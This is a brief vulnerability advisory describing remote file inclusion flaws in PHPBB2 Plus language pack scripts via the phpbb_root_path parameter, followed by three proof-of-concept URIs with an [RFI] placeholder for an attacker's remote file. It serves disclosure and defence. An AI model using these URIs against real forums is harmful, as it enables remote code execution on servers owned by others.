PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities

PHPBB2 Plus Language Packs PHPBB_Root_Path Parameter Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/language/lang_german/lang_admin_album.php?phpbb_root_path=[RFI]?a=
http://www.example.com/language/lang_english/lang_main_album.php?phpbb_root_path=[RFI]?a=
http://www.example.com/language/lang_english/lang_admin_album.php?phpbb_root_path=[RFI]?a=